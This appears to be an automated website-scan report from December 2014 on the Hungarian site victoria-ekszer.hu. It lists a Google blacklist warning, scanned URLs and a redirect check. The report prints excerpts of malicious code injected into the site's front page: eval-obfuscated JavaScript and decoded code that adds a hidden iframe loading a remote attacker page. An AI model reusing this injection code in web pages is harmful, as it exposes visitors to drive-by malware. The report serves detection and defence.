Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=victoria-ekszer.hu
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.victoria-ekszer.hu/ | 200 OK Content-Length: 88889 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{Math.roundd();}catch(qw){try{12+prototype;}catch(zxc){e=window["eva"+"l"];n="117.100.900.1110.891.1170.981.1010.990.1160.414.1190.1026.1050.1044.1010.360.390.540.1050.918.1140.873.1090.909.320.1035.1140.891.610.306.1040.1044.1160.1008.580.423.470.999.1150.981.1170.1026.1210.918.460.1026.1170.423.990.999.1170.990.1160.441.570.414.1120.936.1120.306.320.990.970.981.1010.549.340.756.1190.945.1160.1044.1010.1026.340.288.1150.891.1140.999.1080.972.1050.9 ...[453 bytes skipped]... Decoded script: ...[9901 bytes skipped]... ] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://dnerwiiq.cz.cc/count16.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://dnerwiiq.cz.cc/count16.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } if (document.getElementsByTa ...[709 bytes skipped]... Antivirus reports:
| ||
http://howhigh.xz.lt/pub/counter.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:48 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://www.serveriai.lt/talpinimas.html | 200 OK Content-Length: 9880 Content-Type: text/html | clean |
http://www.serveriai.lt/ | 200 OK Content-Length: 7851 Content-Type: text/html | clean |
http://www.serveriai.lt//www.iv.lt/jquery/js/jquery.js/ | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Dec 2014 18:49:48 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Dec 2014 18:49:48 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.iv.lt/jquery/js/notice.jquery.js/ | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Dec 2014 18:49:48 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Dec 2014 18:49:48 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.iv.lt/statistika.php?type=last_order&service=svetain%EBs+talpinimas+ir+el.+pa%F0tas/ | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Dec 2014 18:49:48 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://howhigh.xz.lt//www.iv.lt/dokumentai/talpinimas.pdf/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:48 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/srautas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/vieta.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/pastas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/php.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/mysql.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/multi-domain.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/programos.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/apsauga.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/ssl.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/kopijos.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/garantija.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/neribojami.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/didmenininkams.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/profesionalus.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/dizainas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/demo/user.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/talpinimas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/domenai.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/klientams.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:49 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/pirkti.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 18:49:50 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://www.reconstructing.me/is.js | 200 OK Content-Length: 1557 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: victoria-ekszer.hu
Result:
GET / HTTP/1.1
Host: victoria-ekszer.hu
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: victoria-ekszer.hu
Referer: http://www.google.com/search?q=victoria-ekszer.hu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: victoria-ekszer.hu
Referer: http://www.google.com/search?q=victoria-ekszer.hu
Result:
The result is similar to the first query. There are no suspicious redirects found.